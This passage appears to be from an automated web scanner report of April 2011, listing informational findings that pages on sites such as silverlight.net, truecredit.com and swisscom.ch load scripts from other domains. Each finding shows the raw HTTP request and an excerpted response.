<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

24.277. http://www.reputationmanagementconsultants.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<link rel="stylesheet" href="/style.css" type="text/css">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</iframe>

<script type="text/javascript" src="//www.veruta.com/scripts/trackmerchant.js"></script>
...[SNIP]...

24.278. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
</div>


<script src="http://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="reseller_curve_bl">

<script src="http://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=75ga67a9e1266b359cd4366b52cd37b2396947b5c91h26;c=s;v=2"></script>
...[SNIP]...
</div>
   
   
<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="http://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...

24.279. https://www.senderscore.org/landing/ppcregistration/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:54 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:30:54 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ff42t7omks9m225jgdh0f4huh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<!-- SiteCatalyst code version: H.15.1
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" src="https://www.fathomseo.com/ssl/tracking/fssenderscore.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.15.1
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" src="https://www.fathomseo.com/ssl/tracking/fsreturnpath.js"></script>
...[SNIP]...

24.280. http://www.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zgozx2vojaovd445odimduvm; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:57 GMT
Content-Length: 38062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Home : The
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.281. http://www.silverlight.net/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:44 GMT
Content-Length: 18546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Contact Us
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.282. http://www.silverlight.net/getstarted/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/ HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:52 GMT
Content-Length: 30305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Get Starte
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.283. http://www.silverlight.net/getstarted/devices/windows-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/devices/windows-phone/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/devices/windows-phone/ HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:45 GMT
Content-Length: 18319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.284. http://www.silverlight.net/learn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/ HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:54 GMT
Content-Length: 31557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Learn : Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.285. http://www.silverlight.net/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /privacy.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:20 GMT
Content-Length: 19694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Privacy St
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.286. http://www.silverlight.net/termsofuse.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /termsofuse.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /termsofuse.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:41 GMT
Content-Length: 50430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Terms Of U
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=04212011-001" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.287. http://www.swisscom.ch/res/hilfe/kontakt/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /res/hilfe/kontakt/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /res/hilfe/kontakt/index.htm HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=konxap55khxflt55gkhxc1up; path=/
Set-Cookie: languageId=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49378
X-Cache: MISS from www.swisscom.ch


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...
<!-- search -->
   <script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.cookie.js"></script>
   <script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.nyroModal-1.6.2.js"></script>
   <script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.ba-postmessage.min.js"></script>
   
       <script type="text/javascript" src="http://search.bluewin.ch/js/popup/search.popup.js"></script>
   
   <script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.base64.js"></script>
...[SNIP]...
</script>


<script language="JavaScript" type="text/javascript" src="http://sc.swisscom.ch/js/osn/s_one_code.js"></script>
...[SNIP]...

24.288. http://www.truecredit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truecredit.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.truecredit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_visit%3D1%7C1303680178921%3B%20s_depth%3D1%7C1303680178926%3B%20dfa_cookie%3Dtuitruecredit%7C1303680178936%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%255D%7C1461531178941%3B%20s_invisit%3Dtrue%7C1303680178950%3B%20s_lv%3D1303678378956%7C1398286378956%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680178956%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680178964%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:45:45 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303692345875
Set-Cookie: TCVISIT=558555500-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=gQcVE8W9hMYg; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34723


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="http://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Tru
...[SNIP]...
</body>


<script language="javascript" src="https://www.upsellit.com/upsellitJS4.jsp?siteID=2723&qs=254271203240331329344340313313344321295289275341328340277313&trackingInfo=http%3A%2F%2Fwww.truecredit.com%2Fproducts%2Fupsellit%2Forder.jsp%3FversionID%3D0%26package%3DFree7DayTrialTriBureauCMU_TUTrial%26formName%3DfreeSingleCMUChoice%26trackPixel%3Dupsellit%26loc%3D2310"></script>
...[SNIP]...

24.289. https://www.truecredit.com/products/optimizedOrder.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /products/optimizedOrder.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_depth%3D1%7C1303693477019%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_visit%3D1%7C1303693853489%3B%20dfa_cookie%3Dtuitruecredit%7C1303693853506%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%255D%7C1461544853528%3B%20s_invisit%3Dtrue%7C1303693853537%3B%20s_lv%3D1303692053541%7C1398300053541%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693853541%3B%20s_pv%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693853547%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20s_ppv%3D100%3B%20SC_LINKS%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%255E%255Ehttp%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255Etc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%2520%257C%2520http%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:04 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303695004739
Set-Cookie: TCVISIT=558558858-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=dEs-TS58-_K8; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

